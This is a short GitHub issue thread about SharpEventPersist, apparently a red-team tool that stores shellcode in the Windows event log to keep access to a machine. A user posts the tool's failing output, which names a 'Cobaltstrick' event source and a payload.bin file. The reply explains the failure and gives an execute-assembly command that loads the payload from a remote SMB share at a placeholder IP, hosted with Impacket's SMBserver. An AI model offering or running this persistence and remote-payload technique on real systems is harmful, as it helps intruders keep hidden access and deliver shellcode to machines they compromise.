improsec/SharpEventPersist

hello,

Opened this issue · 1 comments

Using shellcode: C:\Users\Administrator\Desktop\payload.bin
Setting event log instance id: 1337
Setting event log source to: Cobaltstrick
Setting event log to: Key Management Service
[-] Invoke_3 on EntryPoint failed.
why?

Is the payload binary on the target at C:\Users\Administrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running on.

If you want to host your payload remotely, you could do something like this:

execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin

Where the IP is an SMB server with your payload. I used Impacket's SMBserver for my testing and it worked well.
